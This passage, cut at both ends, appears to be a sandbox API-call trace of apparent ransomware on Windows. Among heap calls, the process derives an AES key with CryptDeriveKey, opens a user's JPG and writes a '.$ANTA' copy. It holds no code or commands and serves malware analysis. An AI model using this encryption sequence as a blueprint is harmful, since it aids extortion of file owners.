hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0095.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0095.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0095.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0095.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0095.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0095.484] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0095.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0095.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0095.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0095.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0095.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0095.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0095.484] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0095.484] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0095.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0095.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0095.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0095.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0095.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0095.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0095.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0095.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0095.485] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0095.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0095.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0095.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0095.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0095.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0095.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0095.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0095.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0095.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0095.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0095.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0095.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0095.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0095.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0095.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0095.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0095.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cab20, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0095.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0095.487] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0095.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0095.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0095.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0095.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0095.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0095.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0095.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0095.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0095.487] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac6c0, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac180) returned 1 [0095.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0095.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0095.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0095.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0095.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0095.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0095.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0095.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0095.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0095.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0095.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0095.489] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.489] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0095.489] CryptDestroyHash (hHash=0x41ac6c0) returned 1 [0095.489] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\Z3f-n12Dk_aAtm.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\z3f-n12dk_aatm.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0095.489] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.490] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0095.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0095.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0095.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0095.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0095.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0095.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0095.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0095.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0095.490] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0095.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0095.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0095.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0095.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0095.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0095.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0095.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0095.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0095.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0095.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0095.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0095.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0095.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0095.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0095.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0095.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0095.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0095.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0095.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0095.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0095.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0095.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0095.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4370 [0095.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0095.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0095.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0095.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369d18 [0095.491] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz")) returned 0x10 [0095.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0095.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0095.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0095.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0095.492] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\Z3f-n12Dk_aAtm.jpg.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\z3f-n12dk_aatm.jpg.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0095.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0095.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0095.493] RtlAllocateHeap 